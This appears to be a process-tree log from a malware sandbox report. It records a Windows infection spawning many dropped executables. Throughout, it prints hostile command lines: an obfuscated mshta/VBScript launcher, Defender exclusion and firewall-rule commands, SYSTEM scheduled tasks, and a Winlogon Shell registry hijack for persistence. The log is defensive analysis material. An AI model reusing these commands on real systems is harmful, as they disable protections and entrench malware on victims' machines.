C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2556 /prefetch:112⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2576 /prefetch:112⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2948 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3192 /prefetch:212⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2032 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=3364 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=1512 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2032 /prefetch:812⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "cmkbfDAd_miQBvOKH4Fe2TD_.exe"12⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\C0tgNAOxqaCNg3uOrAPJqEce.exe"C:\Users\Admin\Pictures\Adobe Films\C0tgNAOxqaCNg3uOrAPJqEce.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9128 -s 172410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-N23A4.tmp\Pr94tBJFmmmBtB5jfTVqm8MB.tmp"C:\Users\Admin\AppData\Local\Temp\is-N23A4.tmp\Pr94tBJFmmmBtB5jfTVqm8MB.tmp" /SL5="$6050C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-GG4PD.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-GG4PD.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\e2-67f0b-c3a-d5aa5-8fcdac036f426\Baeqeloqeji.exe"C:\Users\Admin\AppData\Local\Temp\e2-67f0b-c3a-d5aa5-8fcdac036f426\Baeqeloqeji.exe"12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86eec46f8,0x7ff86eec4708,0x7ff86eec471814⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:214⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:314⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2112 /prefetch:114⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:814⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:114⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:114⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1904 /prefetch:114⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:114⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:814⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1f-7a238-8ea-7cb8a-8761cb366a4fa\Cyfocypafi.exe"C:\Users\Admin\AppData\Local\Temp\1f-7a238-8ea-7cb8a-8761cb366a4fa\Cyfocypafi.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exeC:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exe /qn CAMPAIGN="654"14⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exeC:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe"C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe" -u15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exe /mixfive14⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aysi5tnv.xli\autosubplayer.exe /S & exit13⤵
-
-
-
C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe"C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe" /VERYSILENT12⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XncyffkwayF4lTgU16i6A8Zi.exe"C:\Users\Admin\Pictures\Adobe Films\XncyffkwayF4lTgU16i6A8Zi.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"9⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe" -u10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UYXncJ1J4Hle8NWjUMq5U4KZ.exe"C:\Users\Admin\Pictures\Adobe Films\UYXncJ1J4Hle8NWjUMq5U4KZ.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 2768⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\0jQNr3rBaYZ4IKwSbC3yTB8P.exe"C:\Users\Admin\Pictures\Adobe Films\0jQNr3rBaYZ4IKwSbC3yTB8P.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7elpvTmw1vT1ONC9ndp6H4va.exe"C:\Users\Admin\Pictures\Adobe Films\7elpvTmw1vT1ONC9ndp6H4va.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\T95LOChSK2FJnZ8sP6x6_E2w.exe"C:\Users\Admin\Pictures\Adobe Films\T95LOChSK2FJnZ8sP6x6_E2w.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\e8R37IpGW_6y4VHKwqVXv_JJ.exe"C:\Users\Admin\Pictures\Adobe Films\e8R37IpGW_6y4VHKwqVXv_JJ.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Bd4X2NxFXA5NEmJKfUAVox3h.exe"C:\Users\Admin\Pictures\Adobe Films\Bd4X2NxFXA5NEmJKfUAVox3h.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\Q_fET_usQo2X_6EmGsXsx62w.exe"C:\Users\Admin\Pictures\Adobe Films\Q_fET_usQo2X_6EmGsXsx62w.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\GmSS5Vhk5wUk9_ol891okFe6.exe"C:\Users\Admin\Pictures\Adobe Films\GmSS5Vhk5wUk9_ol891okFe6.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 6848⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HZF5DVkBv1ZqBbYSSg8j3oEv.exe"C:\Users\Admin\Pictures\Adobe Films\HZF5DVkBv1ZqBbYSSg8j3oEv.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 2808⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CccUqSnvorEDEpUpxK4J3YF5.exe"C:\Users\Admin\Pictures\Adobe Films\CccUqSnvorEDEpUpxK4J3YF5.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\rNJcnZZc_xAGgCmOJGIzn_UI.exe"C:\Users\Admin\Pictures\Adobe Films\rNJcnZZc_xAGgCmOJGIzn_UI.exe"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM8⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Creates scheduled task(s)
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal8⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\9⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \9⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1229427acd4bc167.exe5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed120b6f5c6d562.exe5⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 5245⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed126ca6605dbec0399.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed128c2773227671b3f.exe5⤵
- Suspicious use of WriteProcessMemory
-
-
-
-
-
C:\Windows\SysWOW64\systray.exe"C:\Windows\SysWOW64\systray.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe"3⤵
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\8355.exeC:\Users\Admin\AppData\Local\Temp\8355.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\8355.exeC:\Users\Admin\AppData\Local\Temp\8355.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\EA3E.exeC:\Users\Admin\AppData\Local\Temp\EA3E.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 2763⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\5DD8.exeC:\Users\Admin\AppData\Local\Temp\5DD8.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\B0AD.exeC:\Users\Admin\AppData\Local\Temp\B0AD.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\1CE5.exeC:\Users\Admin\AppData\Local\Temp\1CE5.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1CE5.exeC:\Users\Admin\AppData\Local\Temp\1CE5.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\A20F.exeC:\Users\Admin\AppData\Local\Temp\A20F.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\D872.exeC:\Users\Admin\AppData\Local\Temp\D872.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\9C.exeC:\Users\Admin\AppData\Local\Temp\9C.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9072 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\83D7.exeC:\Users\Admin\AppData\Local\Temp\83D7.exe2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\25E.exeC:\Users\Admin\AppData\Local\Temp\25E.exe2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release3⤵
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /release4⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\72AD.exeC:\Users\Admin\AppData\Local\Temp\72AD.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"4⤵
-
-
-
